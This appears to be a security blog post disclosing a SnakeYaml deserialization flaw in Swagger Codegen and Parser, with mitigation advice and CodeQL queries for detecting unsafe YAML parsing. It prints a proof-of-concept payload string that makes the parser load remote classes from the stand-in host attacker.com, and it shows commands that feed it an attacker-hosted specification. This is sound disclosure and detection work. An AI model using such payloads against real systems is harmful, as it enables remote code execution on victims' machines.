In this post I use CodeQL, our code query language, to describe a class of vulnerabilities caused by parsing untrusted YAML data. In particular, I describe how I discovered a vulnerability in the Swagger Code Generator, which uses SnakeYaml to parse YAML data in an unsafe way, enabling an arbitrary code execution attack. I illustrate the dangers of parsing unsanitized YAML with SnakeYaml, and show how this affects Swagger.

Swagger Codegen and Swagger Parser remote code execution vulnerability (CVE-2017-1000207 and CVE-2017-1000208)

Swagger is the world’s largest framework of API developer tools for the OpenAPI Specification (OAS). Swagger Codegen enables users to automatically generate server-side and client-side REST API code in multiple languages from a format called an OpenAPI definition. An OpenAPI definition can be specified in either JSON or YAML format, and the same definition can be reused to generate APIs for different languages and frameworks.

This vulnerability in Swagger allows an attacker to execute arbitrary code when an untrusted OpenAPI/Swagger specification written in YAML format is parsed, due to the way Swagger invokes the SnakeYaml library. Unlike a previous vulnerability, which relies on the user to both generate code from the specification and then run the generated code, this vulnerability will execute arbitrary code when the specification is parsed with Swagger Codegen or Swagger Parser. In particular, this will happen when either the validate or the generate command is used on a vulnerable version of Swagger Codegen.

For example:

java -jar swagger-codegen-cli.jar generate -i http://attacker.com/untrusted-specification.yaml -l java

or:

java -jar swagger-codegen-cli.jar generate -i untrusted-specification.yaml -l java

When either of the above commands is executed on a specially-crafted specification containing malicious code, Swagger Codegen will execute that code upon parsing the YAML file.

Leading up to the release of Swagger Codegen 2.2.3, a new command was introduced: validate. I reported the vulnerability just before the release of Codegen 2.2.3, which means that the validate command was only briefly affected in unreleased versions of the Swagger Codegen source code. For example:

java -jar swagger-codegen-cli.jar validate -i http://attacker.com/untrusted-specification.yaml

Swagger Codegen is often executed using a YAML specification from an online resource (e.g., see Codegen example usage). An attacker with permissions to change such an online specification can execute arbitrary code on a user’s machine by uploading a specially-crafted YAML file.

Swagger Parser is a popular library that can be included in other applications to parse YAML data. Applications using the Swagger Parser library are also vulnerable to remote code execution when parsing YAML files from untrusted remote sources (see Usage in Swagger Parser’s documentation on GitHub).

Online code generators and validators built using Swagger Parser (e.g. generator.swagger.io, online.swagger.io and swagger editor) are potentially at risk. It is not difficult to construct YAML data to potentially exploit this vulnerability: consider evilpet.yml, a trivial modification of the petstore sample from Swagger Codegen.

Mitigation advice for Swagger users

Users are strongly advised to urgently update to the latest versions of Swagger Codegen (at the time of writing: version 2.2.3) and/or Swagger Parser (1.0.31 at the time of writing). This vulnerability is known under two CVE identifiers: CVE-2017-1000207 and CVE-2017-1000208.

Vendor response

SnakeYaml deserialization vulnerability

The vulnerability in Swagger is actually caused by unsafe use of SnakeYaml. SnakeYaml is a widely-used YAML parser written in Java. A lesser-known feature of SnakeYaml is its support for a special syntax that allows the constructor of any Java class to be called when parsing YAML data. For example, consider the following piece of Java code that uses SnakeYaml to parse a string in the malicious variable:

import org.yaml.snakeyaml.Yaml;

String malicious = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
                 + "[[!!java.net.URL [\"http://attacker.com\"]]]]";
Yaml yaml = new Yaml();            // Unsafe instance of Yaml that allows any constructor to be called.
Object obj = yaml.load(malicious); // Triggers a request to http://attacker.com

Upon parsing the malicious string, SnakeYaml will invoke the ScriptEngineManager constructor and make a request to http://attacker.com. This is actually a reasonably harmless example. As we’ve shown in previous blog posts about Java deserialization vulnerabilities: if attackers are able to call arbitrary Java constructors, this also allows them to execute any command on the affected machine. Examples of harmful payloads for various Java deserialization frameworks (including SnakeYaml) are widely available online, e.g. https://github.com/mbechler/marshalsec.
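To make the mechanism concrete, here is a minimal sketch of what a tag-driven parser effectively does when it reads something like !!java.net.URL ["http://attacker.com"]. This is not SnakeYaml's actual implementation; the class name TagInstantiationSketch and the method construct are hypothetical, and the sketch only handles constructors that take a single String. It uses nothing beyond the JDK:

```java
import java.lang.reflect.Constructor;

// Hypothetical sketch, not SnakeYaml's code: it only illustrates how a tag of
// the form "!!fully.qualified.Name [arg]" can end up as a constructor call.
class TagInstantiationSketch {

    // Instantiates the named class with a single String argument.
    static Object construct(String className, String arg) {
        try {
            Class<?> type = Class.forName(className);              // the input chooses the class
            Constructor<?> ctor = type.getConstructor(String.class);
            return ctor.newInstance(arg);                          // the input chooses the argument
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("Could not construct " + className, e);
        }
    }

    public static void main(String[] args) {
        // Creating a URL object does not open a connection; the point is only
        // that the input string decided which constructor was invoked.
        Object obj = construct("java.net.URL", "http://attacker.com");
        System.out.println(obj.getClass().getName());
    }
}
```

Because both the class name and the argument come from the parsed data, any class on the classpath with a suitable constructor becomes reachable, which is what makes the nested payload above possible.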

So, parsing unsanitized data using a Yaml object instantiated with the default constructor allows an attacker to execute arbitrary code on the victim’s machine, even with the default classpath containing just the JDK. This provides an attacker with a very powerful attack vector, affecting every application that uses SnakeYaml in an unsafe way. In recent years, vulnerabilities of this kind have been found in various open source projects, such as RESTEasy (CVE-2016-9606), Apache Brooklyn (CVE-2016-8744), and Apache Camel (CVE-2017-3159).

Mitigation advice for SnakeYaml users

If you’re using SnakeYaml to parse YAML data, only ever use a Yaml instance that is constructed either with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());

or an instance constructed with a Constructor specifying a specific class:

Yaml yaml = new Yaml(new Constructor(SafeClass.class));

Using the default constructor (without any parameters) will put your application and its users at risk.
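The idea behind both safe options is an allow-list: the application, not the input, decides which types may be instantiated. The following is a minimal sketch of that idea using only the JDK. It is not how SafeConstructor or Constructor is implemented; the class AllowListSketch, the method construct, and the contents of ALLOWED_TYPES are hypothetical and chosen purely for illustration:

```java
import java.util.Set;

// Hypothetical sketch of allow-list based instantiation. It illustrates the
// principle only and does not reproduce SnakeYaml's internals.
class AllowListSketch {

    // Assumed allow-list; a real application would list only the types it expects.
    private static final Set<String> ALLOWED_TYPES =
            Set.of("java.lang.String", "java.math.BigDecimal");

    // Constructs the named type from a single String argument, but only if the
    // type is on the allow-list. Everything else is rejected before any
    // reflection takes place.
    static Object construct(String className, String arg) {
        if (!ALLOWED_TYPES.contains(className)) {
            throw new IllegalArgumentException("Type not on the allow-list: " + className);
        }
        try {
            return Class.forName(className).getConstructor(String.class).newInstance(arg);
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("Could not construct " + className, e);
        }
    }

    public static void main(String[] args) {
        System.out.println(construct("java.math.BigDecimal", "1.5"));
        try {
            construct("javax.script.ScriptEngineManager", "ignored");
        } catch (IllegalArgumentException e) {
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```

The check runs before the class is even loaded, so a tag naming an unexpected type never reaches a constructor.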

The detection of unsafe parsing with SnakeYaml has recently been included in CodeQL (Deserialization of user-controlled data). Project maintainers should check whether there are any alerts of this type in their projects and review the results carefully.

Using CodeQL to find unsafe uses of SnakeYaml

With CodeQL, LGTM’s flexible code query technology, it is easy to write a query to find unsafe uses of SnakeYaml, including the one in Swagger Parser. First, let us take a look at the code pattern that we want to identify:

Object obj = yaml.load(malicious);

where malicious comes from a potentially untrusted source and yaml is an instance of the class org.yaml.snakeyaml.Yaml. The CodeQL Dataflow library provides a class RemoteUserInput, which captures the concept of input provided by a remote user; this includes data provided through HTTP requests and connection sockets. So we only need to find calls to the load method of an instance of the Yaml class. To do so, we first define a Yaml class:

class Yaml extends RefType {
  Yaml() {
    this.hasQualifiedName("org.yaml.snakeyaml", "Yaml")
  }
}

This specifies that the QL class Yaml represents the Java class named Yaml in the package org.yaml.snakeyaml. To identify a call to the load method, we make use of the MethodAccess class, which is an abstraction of a method call:

class SnakeYamlParse extends MethodAccess {
  SnakeYamlParse() {
    exists(Method m | m.getDeclaringType() instanceof Yaml and
      m.hasName("load") and
      m = this.getMethod()
    )
  }
}

Putting these together, we can use the following query to identify cases where remote user input is being parsed by a SnakeYaml parser:

from RemoteUserInput source, SnakeYamlParse parse
where source.flowsTo(parse.getArgument(0))
select source, parse

Note that in the second line, we use .flowsTo to track the RemoteUserInput, making sure that the argument of the load method comes from a remote source.

SnakeYaml can also be used in a safe way, by passing an instance of a SafeConstructor to the Yaml constructor. While our query makes sure that we only find cases where a remote source is parsed, it doesn’t differentiate between safe and unsafe parsers. Here’s an example of a safe invocation of the Yaml parser:

Yaml yaml = new Yaml(new SafeConstructor()); // Only allows a small white-listed set of constructors.
Object obj = yaml.load(malicious); // Safe to use

To filter out these safe cases from our query results, we want to exclude instances of Yaml that are constructed with a SafeConstructor passed to its constructor. Again, we first specify a model for the SafeConstructor class:

class SnakeYamlSafeConstructor extends RefType {
  SnakeYamlSafeConstructor() {
    this.hasQualifiedName("org.yaml.snakeyaml.constructor", "SafeConstructor")
  }
}

We can now use the ClassInstanceExpr class, which represents an expression that creates an object, to look for constructions of SafeConstructor instances:

class SafeSnakeYamlConstruction extends FlowSource, ClassInstanceExpr {
  SafeSnakeYamlConstruction() {
    this.getConstructedType() instanceof SnakeYamlSafeConstructor
  }
}

To identify cases where the Yaml object is safely constructed, we look for Yaml constructor calls whose first argument is a SafeConstructor instance:

class SafeYaml extends FlowSource, ClassInstanceExpr {
  SafeYaml() {
    this.getConstructedType() instanceof Yaml and
    exists(SafeSnakeYamlConstruction ssyc | ssyc.flowsTo(this.getArgument(0)))
  }
}

Here we use .flowsTo again to track an instance of SafeConstructor that goes into the constructor argument of Yaml. Putting these together, we can now extend the SnakeYamlParse class into the class UnsafeSnakeYamlParse that only identifies parsing from an unsafe Yaml instance:

class UnsafeSnakeYamlParse extends MethodAccess {
  UnsafeSnakeYamlParse() {
    exists(Method m | m.getDeclaringType() instanceof Yaml and
      m.hasName("load") and
      m = this.getMethod()
    ) and
    not exists(SafeYaml sy | sy.flowsTo(this.getQualifier()))
  }
}

Unsafe Parsing